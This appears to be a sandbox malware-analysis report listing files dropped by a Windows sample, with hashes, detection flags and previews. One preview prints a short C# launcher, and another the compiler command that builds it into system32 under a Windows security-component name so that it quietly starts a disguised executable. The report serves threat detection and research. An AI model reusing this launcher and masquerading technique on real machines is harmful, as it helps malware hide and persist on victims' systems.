                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbxyldks.bp1.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4eiuitm.3vb.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbzqehv3.gzp.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thjx11cl.0oh.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzj5knat.5hk.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2xudxrz.zul.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsx5rqdf.kma.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt0phrlr.beq.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\cBi7y8wmkT

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40960
                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\ckgoF42tD6

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\eXvEeXo5mx

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106496
                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.0.cs

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):419
                                                                                                    Entropy (8bit):4.9133973933122865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6uYAqBWRtiFkD:JNVQIbSfhV7TiFkMSfhWYRkFkD
                                                                                                    MD5:4632EC9B170D0C420501FD4DD4779CB6
                                                                                                    SHA1:4C6225BB9C450F77DCCF94BE69C8F247C17C52E2
                                                                                                    SHA-256:68DA30FAABE641853A1C817A06F82CF8FD9E24E4CA6C934BC4FC86E43F926410
                                                                                                    SHA-512:72B746D649D1E00A6E2E1FB26284765DCD56126A15A3E466AE44ABC90CCD12A066BF111FC41BE32378C50284478B42EB07E1546FC02635970F521E987790F983
                                                                                                    Malicious:false
                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"); } catch { } }).Start();. }.}.

                                                                                                    C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):250
                                                                                                    Entropy (8bit):5.090908473425903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fd9:Hu7L//TRq79cQWfF9
                                                                                                    MD5:3A883E564CB1FAD570B7EB6CCE005A71
                                                                                                    SHA1:72C8C3F0B14872E0ED6708217FF9557595E6B081
                                                                                                    SHA-256:1C9EB839FBB6B85A3FCC52AEA6378EF3E7EFDA25DD35C5951B9E072FA6148B28
                                                                                                    SHA-512:0AFC1B5D0835B324A1ABC3277C3FF7B219B5F1077A6E6AF2F5788E4B94AC15B6B43748960E0952C50E95D4F54ECE3EE26464F5CDEBEA72FCCF50A21D20DDC2CE
                                                                                                    Malicious:true
                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.0.cs"

                                                                                                    C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.out

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):750
                                                                                                    Entropy (8bit):5.261343534484639
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfF4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfqKax5DqBVKVrdFAMb
                                                                                                    MD5:B325188F80F4503267419A9B6A1E560C
                                                                                                    SHA1:CD643CCD695261F7AF1340DDFAF56AFEBED0104B
                                                                                                    SHA-256:25D0648194A84973F7F9CF31A75CBDD61A37CEC7F48600D2AF7336FDCBDC9553
                                                                                                    SHA-512:307FB05DFC94A3F7E042871AFE628B975687554A24C661AF9E03083F986614E19D0F4B9C358E80832A62B314355DF3DB3F146A7CA581D977F0CD788C43C38351
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                    C:\Users\user\AppData\Local\Temp\uKWmKdnjVI

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106496
                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\w7pSzP5EZ7

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\AIflJiPS.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32256
                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: aW6kSsgdvv.exe, Detection: malicious, Browse
                                                                                                    • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                                    • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
                                                                                                    • Filename: lEwK4xROgV.exe, Detection: malicious, Browse
                                                                                                    • Filename: Gg6wivFINd.exe, Detection: malicious, Browse
                                                                                                    • Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse
                                                                                                    • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                                    • Filename: updIMdPUj8.exe, Detection: malicious, Browse
                                                                                                    • Filename: t8F7Ic986c.exe, Detection: malicious, Browse
                                                                                                    • Filename: 544WP3NHaP.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\CeJjFnSo.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\JNOIyhEg.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34304
                                                                                                    Entropy (8bit):5.618776214605176
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\KpOqUOcm.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33792
                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\LHRZphiV.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24576
                                                                                                    Entropy (8bit):5.535426842040921
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                    MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                    SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                    SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                    SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                    C:\Users\user\Desktop\NidZFKNk.log

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34304
                                                                                                    Entropy (8bit):5.618776214605176
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                    Malicious:true
